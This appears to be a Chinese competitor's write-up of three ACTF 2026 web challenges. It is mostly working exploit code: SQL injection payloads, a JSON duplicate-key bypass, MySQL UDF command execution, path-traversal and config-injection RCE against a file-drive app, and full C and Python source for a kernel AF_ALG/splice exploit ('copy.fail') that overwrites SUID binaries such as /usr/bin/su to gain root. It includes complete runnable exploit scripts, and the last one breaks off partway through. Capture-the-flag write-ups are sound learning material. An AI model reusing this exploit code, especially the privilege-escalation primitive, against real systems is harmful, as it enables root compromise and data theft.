ACTF 2026 web 部分
CTF越来越没意思了,已经几乎纯AI了
AI越强就越要防AI,于是题目愈发变难,人类也无能为力,最后还是交给AI
至于人类何去何从?希腊奶
12307
看 Dockerfile:
COPY --chmod=0600 --chown=root:root flag /flag
...
chown root:root /flag
chmod 0600 /flag
chown root:root /usr/bin/base64
chmod 4755 /usr/bin/base64/flag 只有 root 能读,但/usr/bin/base64 被设成了 SUID root,因此目标是让服务端执行:/usr/bin/base64 /flag
打印链路在 services/print_spooler/worker.py:
program = str(ticket.get("driverProgram", ""))
argument = str(ticket.get("driverArgument", ""))
...
value = run_driver(program, argument)启动脚本里写了设备权限:
{
"profile-delta-closeout": {
"codec": "settlement-filter",
"acceptedPrograms": ["/usr/bin/base64"]
},
"profile-north-closeout": {
"codec": "settlement-filter",
"acceptedPrograms": ["/usr/bin/printf"]
},
"profile-baggage-preview": {
"codec": "settlement-filter",
"acceptedPrograms": ["/usr/bin/printf"]
}
}只有 profile-delta-closeout 能跑 /usr/bin/base64。在 services/fixtures/railway_business.json 里,这个 profile 对应 HGH 的设备 PR-HGH-042:
{
"deviceRef": "PR-HGH-042",
"stationCode": "HGH",
"deviceClass": "counter-layout",
"codec": "settlement-filter",
"enabled": 1,
"driverProfile": "profile-delta-closeout"
}所以需要走到 HGH 的 trusted settlement,把打印计划改成:
{
"driverProgram": "/usr/bin/base64",
"driverArgument": "/flag"
}在 services/station_portal/app.py 的 /api/station-office/fares/reprice中,tariffScope 里的 legacy-rank 会把 expr 直接拼进 ORDER BY:
def fare_scope_expression(scope):
...
if scope.get("mode") == "legacy-rank":
return str(scope.get("expr", "ticket_no"))[:240]sql = (
"SELECT ticket_no,station_code,status FROM ticket_index "
"WHERE station_code IN (%s,'BJP') "
f"ORDER BY {scope} LIMIT 1"
)后面根据第一条记录的 ticket_no 返回不同的 bucket:
bucket = "north-window" if row and str(row.get("ticket_no", "")).startswith("T-BJP-") else "local-window"因此可以布尔盲注拿 station_claim_artifacts.claim_salt,构造:
CASE WHEN (
ASCII(SUBSTRING(
(SELECT claim_salt FROM station_claim_artifacts WHERE order_id='xxx' LIMIT 1),
2,1
)) > 77
) THEN (station_code='BJP') ELSE (station_code='HGH') END DESC返回 north-window 说明条件为真,返回 local-window 说明条件为假
然后在 services/receipt_signer/app.py中:
public_view = json.loads(payload_text, object_pairs_hook=first_wins_object)
render_view = json.loads(payload_text)first_wins_object 会保留重复键第一次出现的值,普通 json.loads 会保留最后一次出现的值
校验时用的是 public_view:
checks = {
"batchId": batch_id,
"orderId": order["order_id"],
"stationCode": order["station_code"],
"templateDigest": template_digest,
"routeName": route_name,
"ledgerRef": str((boarding_channel or {}).get("ledgerRef", "")),
"printProfile": "counter-copy",
"printer": "thermal-standard",
}
for key, expected_value in checks.items():
if str(public_view.get(key, "")) != str(expected_value):
return None, ["partner_receipt_review"]但生成打印计划时用的是 render_view:
print_plan = {
"profile": str(render_view.get("printProfile", "counter-copy"))[:64],
"printer": str(render_view.get("printer", "thermal-standard"))[:64],
"prefix": str(render_view.get("prefix", "reconciliation"))[:48],
"cell": str(render_view.get("cell", "receipt"))[:48],
"ledgerRef": checks["ledgerRef"],
"boardingNonce": str((boarding_channel or {}).get("boardingNonce", "")),
"driverProgram": str(render_view.get("driverProgram", ""))[:160],
"driverArgument": str(render_view.get("driverArgument", ""))[:160],
}这里可以直接塞重复键,前面的键负责过检查,后面的键负责控制渲染结果
漏洞有了,后面需要找一条能把恶意 print_plan 送进 PR-HGH-042 的路径
可以直接走 HGH 这一条线,相关的 trusted route、layout、device 都已经在配置里给了。看 services/ticketing_api/app.py,G7608 的 business 初始座位数是 0:
{
"id": "G7608",
...
"stationCode": "HGH",
"initial": {"business": 0, "first": 4, "second": 18},
}这样创建订单之后就会进 waitlist
先调用:
POST /api/mobile/identity/continueservices/sso_gateway/server.js 这里只做了很弱的字符串判断:
const partnerOk = metadata.text.includes("railway-partner") || metadata.text.includes("PassengerIdentityProvider");
const audienceOk = tagValue(assertion.text, "Audience") === "12307" || assertion.text.includes("mobile-passenger");
const nameOk = Boolean(tagValue(assertion.text, "NameID")) || assertion.text.includes("PassengerID");
const relayOk = relay.text.includes("continue") || relay.text.includes("seat-hold");发包:
{
"partnerMetadata": "railway-partner compatBinding",
"relayState": ["continue"],
"assertion": "<Audience>12307</Audience><NameID>pwn</NameID>",
"passenger": "pwn",
"partnerId": "mobile-passenger",
"stationCode": "HGH",
"trustLevel": ["mobile", "partner", "settlement"]
}然后调用:
POST /api/mobile/orders/hold
{"trainId":"G7608","seatClass":"business","holdMode":"waitlist"}这个请求会先经过 edge_gateway,它会再触发一次 continuation 检查,把 session 设置 complete,然后返回 waitlist_session
接着创建订单:
POST /api/mobile/orders
{"trainId":"G7608","seatClass":"business","passenger":"pwn"}拿到 orderId 之后,还要把 trusted settlement 用到的几项 Redis 状态准备好
先写站务公告:
POST /api/desk/noticesproxyHint 写成:
X-Desk-Lane: delta-window-27
X-Board-Window: seat-window-e27
X-Desk-Key-Id: POL-HGH-TRUSTED
X-Desk-Key: delta-window-27然后调用:
POST /api/desk/imports/health参数:
{
"stationCode": "HGH",
"adapter": "station-partner-feed",
"target": "rail-cache://redis/partner/metadata?stationCode=HGH",
"payload": "sync"
}services/station_import/app.py 里会写入:
rail:interline:lane:HGHrail:board:profile:HGHrail:partner:jwks:HGH
随后连接:
GET /api/connect/boarding?stationCode=HGH按顺序发三条 websocket 消息:
{"type":"boarding.hello","channel":"<waitlist_session 或其前8位>"}
{"type":"boarding.bind","topic":"seat-consist","trainId":"G7608","seatClass":"business"}
{"type":"boarding.confirm","orderId":"<orderId>","stationCode":"HGH","epoch":"1"}服务端会返回 ledgerRef,同时在 Redis 写 rail:ledger:channel:<orderId>
之后开始盲注 claim_salt。爆出来以后,本地算:
claim_digest = sha256(f"{orderId}|G7608|HGH|T-HGH-7608-019|{claim_salt}")
claim_proof = f"CP-{claim_salt}-{claim_digest[:12]}"再调用:
POST /api/desk/tickets/adjust传:
{
"ticketNo": "T-HGH-7608-019",
"claimProof": "算出来的值",
"memo": "{\"stationCode\":\"HGH\",\"channel\":\"fare-desk\",\"lineItems\":{\"reason\":\"FARE-91\",\"layout\":\"folio-grid-27\",\"device\":\"PR-HGH-042\",\"enabled\":true}}",
"delta": 1
}这个 memo 要匹配 services/fixtures/railway_business.json 里 HGH 的策略:
"claim": {
"reason": "FARE-91",
"channel": "fare-desk"
},
"layout": {
"cell": "receipt",
"device": "PR-HGH-042"
}然后再打一遍导入:
POST /api/desk/imports/health参数:
{
"stationCode": "HGH",
"adapter": "station-desk-ledger",
"target": "rail-cache://redis/desk-ledger?orderId=<orderId>&stationCode=HGH",
"payload": "apply"
}这里会写入:
UPDATE waitlist_entries SET sampled=1 ...
UPDATE station_profiles SET batch_open=1, renderer_profile=..., signer_route=...
INSERT INTO tariff_exception_claims ...打完这个 station-desk-ledger 之后,数据库里会多出三处变化:
waitlist_entries.sampled=1,对应fare_sample_reviewstation_profiles.batch_open=1、renderer_profile=folio-grid-27、signer_route=delta-window-27,对应station_profile_reviewtariff_exception_claims里多出一条PR-HGH-042的记录,后面的enterprise-clearing会用到
这时候还差 rail:layout:entitlement:<orderId>,这项是在后面的 receipts/prepare 里写进 Redis 的
接下来调用:
POST /api/corporate/reconciliation传 defer=true,先只创建 batch:
{
"orderId": "<orderId>",
"stationCode": "HGH",
"batchId": "<batchId>",
"reportType": "carrier-closeout",
"defer": true,
"data": {"carrier": "exploit"}
}然后构造恶意 carrierSeal,payload 的关键内容如下:
{
"batchId":"...",
"orderId":"...",
"stationCode":"HGH",
"templateDigest":"...",
"routeName":"delta-window-27",
"ledgerRef":"...",
"printProfile":"counter-copy",
"printer":"thermal-standard",
"printProfile":"clearing-batch",
"printer":"line-printer",
"prefix":"reconciliation",
"cell":"receipt",
"driverProgram":"/usr/bin/base64",
"driverArgument":"/flag"
}前面的 printProfile 和 printer 用来过检查,后面的 printProfile 和 printer 会在 render_view 里生效,这样 layout_enabled 这一段条件也能满足:
layout_enabled = (
not reasons
and receipt["render_grant"] == station_cfg.get("grantCode")
and print_plan.get("profile") == "clearing-batch"
and print_plan.get("printer") == "line-printer"
)再配合:
"driverProgram":"/usr/bin/base64",
"driverArgument":"/flag"最后就会进入 PR-HGH-042 -> profile-delta-closeout -> /usr/bin/base64 /flag 这条链
这个 seal 用 POL-HGH-TRUSTED 对应的密钥签名,然后提交:
POST /api/corporate/receipts/prepare这个请求会先经过 enterprise_gateway,代码里有这样一段:
await mergeLayoutClaim(orderId, stationCode);enterprise_gateway 会把这次请求转到 station_import 的 enterprise-clearing。那边会调用 activate_layout_claim(order_id, station_code),执行后 Redis 里会出现:
redis.command("SET", f"rail:layout:entitlement:{order_id}", station_code, "EX", "180")这样 layout_review 这一项也过了
另外还有一个细节,services/waitlist_push/server.js 里:
await redisCommand("SET", `rail:fulfillment:epoch:${orderId}`, "boarding", "EX", "7");这个 key 只活 7 秒。远端盲注 claim_salt 很慢,前面打过一次 waitlist/pulse 的话,等到真正调度结算时这个状态已经过期了,最后只会得到:
{
"ready": false,
"reasons": ["review_required"],
"body": "Reconciliation ... [layout-pending]"
}所以在盲注完成之后,要重新打一遍:
POST /api/mobile/waitlist/pulse
{"orderId":"<orderId>"}最后调度:
POST /api/corporate/settlement/schedule
{"batchId":"<batchId>"}再轮询:
GET /api/corporate/reconciliation/<batchId>成功时返回:
{
"batchId":"B55EEFD108D",
"report":{
"batchId":"B55EEFD108D",
"ready":true,
"reasons":[],
"body":"Reconciliation O92G72UK7HJ waitlisted QUNURnt3SHlfYXIxX3kwdV9zbzBPMG8wT28wb19GYXMxPz8/Pz9fQzJDZnc2cnlEOTR9\n",
"finishedAt":1778377062
}
}末尾这一段 base64 解码就是 flag:
ACTF{wHy_ar1_y0u_so0O0o0Oo0o_Fas1?????_C2Cfw6ryD94}GoMySQL
二血
首先对 /calc 提交的 expression 做测试,可以确认该参数被拼接进入了 SQL 语句。直接提交包含关键字的载荷可以观察到过滤响应,进一步测试后可以确认这里不仅存在注入,而且后端允许分号分隔的多语句执行。题目对输入做了一层黑名单过滤,至少会拦截 SELECT、UPDATE、FLAG、SCHEMA、@@、_ 等字面内容
由于目标数据库支持 execute immediate,可以先把真正要执行的 SQL 编码为十六进制,再通过多语句触发执行。验证脚本如下:
import binascii
import urllib.parse
import urllib.request
base = "http://target/calc"
sql = "show databases"
payload = "1;execute immediate 0x" + binascii.hexlify(sql.encode()).decode()
data = urllib.parse.urlencode({"expression": payload}).encode()
print(urllib.request.urlopen(base, data=data).read().decode("utf-8", "ignore"))利用这一点,可以稳定执行任意 SQL 而不触发黑名单。后续先做环境确认,例如:
show databases
select database()
select load_file('/etc/passwd')
select @@plugin_dir可以确认当前库为 testdb,load_file 可用,且能够获取 MySQL 的插件目录。到这一步,题目的重点已经不再是业务数据,而是如何将 SQL 执行能力扩展为系统命令执行
这里采用 UDF 方案。将预先编译好的 sys_eval 动态库以十六进制形式写入 plugin_dir,随后删除并重建同名函数即可。核心过程如下:
def exec_sql(sql):
expr = "1;execute immediate 0x" + binascii.hexlify(sql.encode()).decode()
data = urllib.parse.urlencode({"expression": expr}).encode()
return urllib.request.urlopen(base, data=data).read().decode("utf-8", "ignore")
udf_hex = open("lib_mysqludf_sys_so.hex.txt", "r", encoding="utf-8").read().strip()
plugin_dir = "/usr/lib/mysql/plugin/"
udf_name = "libudf_x.so"
exec_sql(f"select 0x{udf_hex} into dumpfile '{plugin_dir}{udf_name}'")
exec_sql("drop function if exists sys_eval")
exec_sql(f"create function sys_eval returns string soname '{udf_name}'")
print(exec_sql("select sys_eval('id') as x"))验证结果可以得到 uid=100(mysql) gid=101(mysql),说明已经获得 mysql 用户命令执行。继续检查目标文件权限:
select sys_eval('ls -l /flag; stat /flag 2>/dev/null || true')可见 /flag 为 root:root 且权限为 600,因此 mysql 用户无法直接读取
本地提权部分使用 copy.fail
上传两个预先准备好的 ELF 二进制:一个是 copyfail_patch,负责利用漏洞对 SUID 文件实施定点覆盖;另一个是 flagcat,逻辑仅为 setuid(0); setgid(0); open("/flag"); write(1, ...)。二者均以十六进制字节流形式上传到 /tmp 并赋予执行权限:
patch_hex = open("copyfail_patch.hex.txt", "r", encoding="utf-8").read().strip()
flagcat_hex = open("flagcat.hex.txt", "r", encoding="utf-8").read().strip()
exec_sql(f"select 0x{patch_hex} into dumpfile '/tmp/cfpatch_x'")
exec_sql(f"select 0x{flagcat_hex} into dumpfile '/tmp/flagcat_x'")
exec_sql("select sys_eval('chmod 755 /tmp/cfpatch_x /tmp/flagcat_x')")附copyfail_patch.c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <linux/if_alg.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
#ifndef SOL_ALG
#define SOL_ALG 279
#endif
static void die(const char *msg) {
perror(msg);
exit(1);
}
static void do_patch(int fd, size_t off, const unsigned char *chunk, size_t len) {
int sfd, afd, pipes[2];
struct sockaddr_alg sa;
unsigned char key[40] = {
0x08, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x10
};
unsigned char payload[8];
struct msghdr msg;
struct iovec iov;
unsigned char cbuf[CMSG_SPACE(4) + CMSG_SPACE(20) + CMSG_SPACE(4)];
struct cmsghdr *cmsg;
uint32_t zero = 0;
uint32_t assoclen = 8;
struct {
uint32_t ivlen;
unsigned char iv[16];
} ivmsg;
loff_t splice_off = 0;
size_t want;
unsigned char *drain;
memset(&sa, 0, sizeof(sa));
sa.salg_family = AF_ALG;
strcpy((char *)sa.salg_type, "aead");
strcpy((char *)sa.salg_name, "authencesn(hmac(sha256),cbc(aes))");
sfd = socket(AF_ALG, SOCK_SEQPACKET, 0);
if (sfd < 0) die("socket");
if (bind(sfd, (struct sockaddr *)&sa, sizeof(sa)) < 0) die("bind");
if (setsockopt(sfd, SOL_ALG, ALG_SET_KEY, key, sizeof(key)) < 0) die("setsockopt key");
if (setsockopt(sfd, SOL_ALG, ALG_SET_AEAD_AUTHSIZE, &zero, sizeof(zero)) < 0) {
die("setsockopt authsize");
}
afd = accept(sfd, NULL, 0);
if (afd < 0) die("accept");
memset(&msg, 0, sizeof(msg));
memset(&ivmsg, 0, sizeof(ivmsg));
ivmsg.ivlen = 16;
memset(payload, 0, sizeof(payload));
memset(payload, 'A', 4);
memcpy(payload + 4, chunk, len);
iov.iov_base = payload;
iov.iov_len = 4 + len;
msg.msg_iov = &iov;
msg.msg_iovlen = 1;
msg.msg_control = cbuf;
msg.msg_controllen = sizeof(cbuf);
cmsg = CMSG_FIRSTHDR(&msg);
cmsg->cmsg_level = SOL_ALG;
cmsg->cmsg_type = ALG_SET_OP;
cmsg->cmsg_len = CMSG_LEN(4);
memset(CMSG_DATA(cmsg), 0, 4);
cmsg = CMSG_NXTHDR(&msg, cmsg);
cmsg->cmsg_level = SOL_ALG;
cmsg->cmsg_type = ALG_SET_IV;
cmsg->cmsg_len = CMSG_LEN(sizeof(ivmsg));
memcpy(CMSG_DATA(cmsg), &ivmsg, sizeof(ivmsg));
cmsg = CMSG_NXTHDR(&msg, cmsg);
cmsg->cmsg_level = SOL_ALG;
cmsg->cmsg_type = ALG_SET_AEAD_ASSOCLEN;
cmsg->cmsg_len = CMSG_LEN(4);
memcpy(CMSG_DATA(cmsg), &assoclen, sizeof(assoclen));
if (sendmsg(afd, &msg, MSG_MORE) < 0) die("sendmsg");
if (pipe(pipes) < 0) die("pipe");
if (splice(fd, &splice_off, pipes[1], NULL, off + 4, 0) < 0) die("splice file->pipe");
if (splice(pipes[0], NULL, afd, NULL, off + 4, 0) < 0) die("splice pipe->sock");
want = off + 8;
drain = malloc(want);
if (drain == NULL) die("malloc drain");
(void)recv(afd, drain, want, 0);
free(drain);
close(pipes[0]);
close(pipes[1]);
close(afd);
close(sfd);
}
int main(int argc, char **argv) {
FILE *fp;
int fd;
long sz;
unsigned char *buf;
size_t i;
if (argc != 3) {
fprintf(stderr, "usage: %s <target> <payload>\n", argv[0]);
return 1;
}
fp = fopen(argv[2], "rb");
if (fp == NULL) die("fopen payload");
if (fseek(fp, 0, SEEK_END) != 0) die("fseek");
sz = ftell(fp);
if (sz < 0) die("ftell");
if (fseek(fp, 0, SEEK_SET) != 0) die("fseek");
buf = malloc((size_t)sz);
if (buf == NULL) die("malloc");
if (fread(buf, 1, (size_t)sz, fp) != (size_t)sz) die("fread");
fclose(fp);
fd = open(argv[1], O_RDONLY);
if (fd < 0) die("open target");
for (i = 0; i < (size_t)sz; i += 4) {
size_t chunk_len = (size_t)sz - i;
if (chunk_len > 4) {
chunk_len = 4;
}
do_patch(fd, i, buf + i, chunk_len);
}
close(fd);
free(buf);
return 0;
}
随后选择 /usr/bin/passwd 作为目标 SUID 程序实施覆盖
print(exec_sql("select sys_eval('od -An -tx1 -N 64 /usr/bin/passwd')"))
print(exec_sql(\"select sys_eval('/tmp/cfpatch_x /usr/bin/passwd /tmp/flagcat_x')\"))
print(exec_sql("select sys_eval('od -An -tx1 -N 64 /usr/bin/passwd')"))
print(exec_sql("select sys_eval('/usr/bin/passwd 2>&1 | head -n 20')"))第一次 od 用于确认原始 ELF 头,执行 patch 后再次查看可以看到头部已经变化,说明 copy.fail 已经成功将目标 SUID 文件替换为自定义 payload。最后执行 /usr/bin/passwd,即可直接以 root 权限输出 /flag
EXP如下(需要准备各个hex.txt文件):
import argparse
import binascii
import html
import pathlib
import random
import re
import string
import urllib.parse
import urllib.request
ROOT = pathlib.Path(__file__).resolve().parent
def rand_suffix(n=6):
return "".join(random.choice(string.ascii_lowercase + string.digits) for _ in range(n))
class Exploit:
def __init__(self, url):
clean = url.rstrip("/")
self.calc = clean if clean.endswith("/calc") else clean + "/calc"
def raw(self, payload):
data = urllib.parse.urlencode({"expression": payload}).encode()
req = urllib.request.Request(self.calc, data=data, headers={"Content-Type": "application/x-www-form-urlencoded"})
return urllib.request.urlopen(req, timeout=120).read().decode("utf-8", "ignore")
def run_sql(self, sql):
payload = "1;execute immediate 0x" + binascii.hexlify(sql.encode()).decode()
return self.raw(payload)
def sys_eval(self, cmd):
cmd = cmd.replace("\\", "\\\\").replace("'", "''")
return self.run_sql(f"select sys_eval('{cmd}') as x")
def rebuild_sys_eval(self):
udf_hex = (ROOT / "lib_mysqludf_sys_so.hex.txt").read_text().strip()
udf_name = "libudf_" + rand_suffix() + ".so"
plugin_dir = "/usr/lib/mysql/plugin/"
self.run_sql(f"select 0x{udf_hex} into dumpfile '{plugin_dir}{udf_name}'")
self.run_sql("drop function if exists sys_eval")
self.run_sql(f"create function sys_eval returns string soname '{udf_name}'")
print(self.run_sql("select sys_eval('id') as x"))
def get_flag(self):
suffix = rand_suffix()
patch_hex = (ROOT / "copyfail_patch.hex.txt").read_text().strip()
flagcat_hex = (ROOT / "flagcat.hex.txt").read_text().strip()
patch = f"/tmp/cfpatch_{suffix}"
flagcat = f"/tmp/flagcat_{suffix}"
self.run_sql(f"select 0x{patch_hex} into dumpfile '{patch}'")
self.run_sql(f"select 0x{flagcat_hex} into dumpfile '{flagcat}'")
self.sys_eval(f"chmod 755 {patch} {flagcat}")
print(self.sys_eval("ls -l /flag; stat /flag 2>/dev/null || true"))
print(self.sys_eval("od -An -tx1 -N 64 /usr/bin/passwd"))
print(self.sys_eval(f"{patch} /usr/bin/passwd {flagcat}"))
print(self.sys_eval("od -An -tx1 -N 64 /usr/bin/passwd"))
print(self.sys_eval("/usr/bin/passwd 2>&1 | head -n 20"))
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--url", required=True)
args = parser.parse_args()
exp = Exploit(args.url)
exp.rebuild_sys_eval()
exp.get_flag()
if __name__ == "__main__":
main()最终读取到的 flag 为:
ACTF{y0u1_sqI_Y0ur_Go!!!!!_dxqmcFIr4ZCpo5OeNqSL}Real DLsite
三血
先登录,默认管理员口令:
admin / 123456然后创建一个 fs drive,把根路径配成穿越:
{
"name": "rootish",
"enabled": true,
"type": "fs",
"config": "{\\\\"path\\\\":\\\\"../../../../\\\\"}"
}
初始化并 reload 之后,就可以通过 rootish/... 访问容器根目录。关键可写位置有两个:
/app/config.yml
/app/data/script-drives/
后台的 script-eval 可以直接执行 JS 并调用 drive.Save 写文件
var tf = newTempFile();
tf.Write(newBytes("PING"));
tf.SeekTo(0, SEEK_START);
var ctx = newTaskCtx(newContext());
var e = drive.Save(ctx, "rootish/app/ping.txt", tf.Size(), true, tf);
log("saved=" + e.Path());
修改 /app/config.yml,打开 thumbnail 的 shell handler :
- type: shell
tags: pwn
file-types: txt
config:
shell: /bin/sh
mime-type: text/plain
write-content: "1"
max-size: "-1"
timeout: 10m
同时设置 thumbnail.handlersMapping
{
"thumbnail.handlersMapping": "pwn:rootish/tmp/*.txt"
}
写一个恶意 script drive,让它在生成 thumbnail 时 panic,这样便会重启,重读 config.yml
写入 /app/data/script-drives/evil.js:
/// <reference path="./scripts/env/drive.d.ts"/>
defineCreate(function (ctx, config, utils) {
return {
meta: function (ctx) { return {}; },
get: function (ctx, path) {
if (path === '' || path === '/') {
return { Path: '', IsDir: true, Size: -1, ModTime: Date.now() };
}
if (path !== 'x.txt' && path !== '/x.txt') throw ErrNotFound();
return { Path: 'x.txt', IsDir: false, Size: 1, ModTime: Date.now(), Meta: { Readable: true, Writable: false } };
},
list: function (ctx, path) {
return [this.get(ctx, 'x.txt')];
},
getReader: function (ctx, entry, start, size) {
return 123;
}
};
});
然后创建 boom:
{
"name": "boom",
"enabled": true,
"type": "script",
"config": "{\\\\"script\\\\":\\\\"evil\\\\"}"
}
初始化完成后访问:
/new/thumbnail/boom/x.txt?_k=...
触发 panic
之后把命令写进 rootish/tmp/cmd.txt,再访问:
/new/thumbnail/rootish/tmp/cmd.txt?_k=...
即可获得稳定的 app 用户 RCE:
uid=1000(app) gid=1000(app) groups=1000(app)
接下来需要提权,使用 copy.fail 修改su
并且存在一个 root cron,会周期性调用 /usr/bin/su:
*/5 * * * * root APP_SECRET="$(cat /run/secrets/www)" exec su -s /bin/bash -p www-data -c 'StorageBox put /var/www/html/db.sqlite'
使用 copy.fail 修改su为我们控制的elf即可
EXP:
#!/usr/bin/env python3
import argparse
import json
import time
import urllib.error
import urllib.parse
import urllib.request
DEFAULT_USER = "admin"
DEFAULT_PASSWORD = "123456"
ROOTISH = "rootish"
BOOM = "boom"
CMD_PATH = f"{ROOTISH}/tmp/cmd.txt"
THUMB_MAPPING = f"pwn:{ROOTISH}/tmp/*.txt"
# Minimal ELF executed as root by cron's `su` call.
# Behavior:
# /bin/sh -c 'cat /root/0-0/flag>/app/data/local/test/f;chmod 644 /app/data/local/test/f'
ROOT_WRITER_ELF_HEX = (
"7f454c4602010100000000000000000002003e00010000007800400000000000"
"4000000000000000300100000000000000000000400038000100400003000200"
"0100000007000000780000000000000078004000000000007800400000000000"
"a000000000000000a00000000000000008000000000000004831d2488d357600"
"0000488d3d1500000048c7c03b0000000f054831ff48c7c03c0000000f052f62"
"696e2f7368002d6300636174202f726f6f742f302d302f666c61673e2f617070"
"2f646174612f6c6f63616c2f746573742f663b63686d6f6420363434202f6170"
"702f646174612f6c6f63616c2f746573742f6600900f1f009e00400000000000"
"a600400000000000a9004000000000000000000000000000002e736873747274"
"6162002e74657874000000000000000000000000000000000000000000000000"
"0000000000000000000000000000000000000000000000000000000000000000"
"0000000000000000000000000b00000001000000070000000000000078004000"
"000000007800000000000000a000000000000000000000000000000008000000"
"0000000000000000000000000100000003000000000000000000000000000000"
"0000000018010000000000001100000000000000000000000000000001000000"
"000000000000000000000000"
)
EVIL_SCRIPT = r"""/// <reference path="./scripts/env/drive.d.ts"/>
defineCreate(function (ctx, config, utils) {
return {
meta: function (ctx) { return {}; },
get: function (ctx, path) {
if (path === '' || path === '/') {
return { Path: '', IsDir: true, Size: -1, ModTime: Date.now() };
}
if (path !== 'x.txt' && path !== '/x.txt') throw ErrNotFound();
return { Path: 'x.txt', IsDir: false, Size: 1, ModTime: Date.now(), Meta: { Readable: true, Writable: false } };
},
list: function (ctx, path) {
return [this.get(ctx, 'x.txt')];
},
getReader: function (ctx, entry, start, size) {
return 123;
}
};
});
"""
SHELL_HANDLER_BLOCK = """ - type: shell
tags: pwn
file-types: txt
config:
shell: /bin/sh
mime-type: text/plain
write-content: "1"
max-size: "-1"
timeout: 10m
"""
COPY_FAIL_PATCH_CMD = r"""
python3 - <<'PY'
import os
import socket
hexs = """ + repr(ROOT_WRITER_ELF_HEX) + r"""
blob = bytes.fromhex(hexs)
def d(x):
return bytes.fromhex(x)
def poke(path, blob):
fd = os.open(path, 0)
h = 279
for off in range(0, len(blob), 4):
c = blob[off:off + 4]
a = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
a.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
a.setsockopt(h, 1, d("0800010000000010" + "0" * 64))
a.setsockopt(h, 5, None, 4)
u, _ = a.accept()
z = b"\\x00"
u.sendmsg(
[b"A" * 4 + c],
[(h, 3, z * 4), (h, 2, b"\\x10" + z * 19), (h, 4, b"\\x08" + z * 3)],
32768,
)
r, w = os.pipe()
os.splice(fd, w, off + 4, offset_src=0)
os.splice(r, u.fileno(), off + 4)
try:
u.recv(8 + off)
except Exception:
pass
print("PATCHED_SU", len(blob), flush=True)
poke("/usr/bin/su", blob)
PY
"""
def normalize_base(base):
base = base.rstrip("/")
if base.endswith("/new"):
api_base = base
root_base = base[:-4]
else:
api_base = base + "/new"
root_base = base
return api_base, root_base
class Exploit:
def __init__(self, api_base, root_base, user, password, verbose=True):
self.api_base = api_base
self.root_base = root_base
self.user = user
self.password = password
self.token = None
self.verbose = verbose
def log(self, *parts):
if self.verbose:
print("[*]", *parts, flush=True)
def req(self, path, method="GET", data=None, headers=None, timeout=30):
if headers is None:
headers = {}
if data is not None and not isinstance(data, (bytes, bytearray)):
data = data.encode()
r = urllib.request.Request(self.api_base + path, data=data, headers=headers, method=method)
try:
with urllib.request.urlopen(r, timeout=timeout) as resp:
return resp.read().decode("utf-8", "ignore"), resp.status
except urllib.error.HTTPError as e:
return e.read().decode("utf-8", "ignore"), e.code
def api(self, path, method="GET", data=None, ctype="application/json", timeout=30):
headers = {"Authorization": self.token}
if data is not None:
headers["Content-Type"] = ctype
if ctype == "application/json" and data is not None and not isinstance(data, str):
data = json.dumps(data)
return self.req(path, method=method, data=data, headers=headers, timeout=timeout)
def auth(self):
last_err = None
for attempt in range(10):
self.log(f"初始化 token,第 {attempt + 1} 次")
body, status = self.req("/auth/init", method="POST")
if status != 200 or not body.strip():
last_err = f"/auth/init 异常: HTTP {status} {body!r}"
time.sleep(1)
continue
try:
self.token = json.loads(body)["token"]
except Exception as e:
last_err = f"/auth/init 解析失败: {body!r} ({e})"
time.sleep(1)
continue
self.log("登录 go-drive 管理后台")
body, status = self.req(
"/auth/login",
method="POST",
data=json.dumps({"username": self.user, "password": self.password}),
headers={"Authorization": self.token, "Content-Type": "application/json"},
)
if status == 200:
return
last_err = f"登录失败: HTTP {status} {body}"
time.sleep(1)
raise RuntimeError(last_err or "认证失败")
def get_entry(self, path):
body, status = self.api("/entry/" + path)
if status != 200:
raise RuntimeError(f"获取 entry 失败: {path} -> HTTP {status} {body}")
return json.loads(body)
def get_content(self, path):
entry = self.get_entry(path)
key = entry["meta"]["accessKey"]
body, status = self.req("/content/" + path + "?_k=" + urllib.parse.quote(key, safe=""))
if status != 200:
raise RuntimeError(f"读取内容失败: {path} -> HTTP {status} {body}")
return body
def save_file(self, path, content):
js = f"""
var tf = newTempFile();
tf.Write(newBytes({json.dumps(content)}));
tf.SeekTo(0, SEEK_START);
var ctx = newTaskCtx(newContext());
var e = drive.Save(ctx, {json.dumps(path)}, tf.Size(), true, tf);
log('saved=' + e.Path());
"""
body, status = self.api("/admin/jobs/script-eval", method="POST", data=js, ctype="text/plain", timeout=60)
if status != 200:
raise RuntimeError(f"写文件失败: {path} -> HTTP {status} {body}")
return body
def ensure_rootish(self):
self.log("确保 rootish drive 存在")
desired = {
"name": ROOTISH,
"enabled": True,
"type": "fs",
"config": "{\\"path\\":\\"../../../../\\"}",
}
self.api("/admin/drive", method="POST", data=desired)
self.api(f"/admin/drive/{ROOTISH}", method="PUT", data=desired)
self.api(f"/admin/drive/{ROOTISH}/init-config", method="POST")
self.api(f"/admin/drive/{ROOTISH}/init", method="POST", data="{}", ctype="application/json")
self.api("/admin/drives/reload", method="POST", data="{}", ctype="application/json")
self.get_entry(f"{ROOTISH}/app/config.yml")
def ensure_shell_handler(self):
self.log("注入 shell thumbnail handler")
cfg_path = f"{ROOTISH}/app/config.yml"
cfg = self.get_content(cfg_path)
if "type: shell\\n tags: pwn" not in cfg:
marker = " # padding: 10\\n"
if marker not in cfg:
raise RuntimeError("未找到配置插入点,config.yml 格式可能变了")
cfg = cfg.replace(marker, marker + SHELL_HANDLER_BLOCK, 1)
self.save_file(f"{ROOTISH}/app/config.yml.bak.exp", self.get_content(cfg_path))
self.save_file(cfg_path, cfg)
self.log("设置 handlersMapping")
body, status = self.api(
"/admin/options",
method="PUT",
data={"thumbnail.handlersMapping": THUMB_MAPPING},
)
if status != 200:
raise RuntimeError(f"写 options 失败: HTTP {status} {body}")
def ensure_boom(self):
self.log("写入 evil script drive")
self.save_file(f"{ROOTISH}/app/data/script-drives/evil.js", EVIL_SCRIPT)
desired = {
"name": BOOM,
"enabled": True,
"type": "script",
"config": "{\\"script\\":\\"evil\\"}",
}
self.api("/admin/drive", method="POST", data=desired)
self.api(f"/admin/drive/{BOOM}", method="PUT", data=desired)
self.api(f"/admin/drive/{BOOM}/init-config", method="POST")
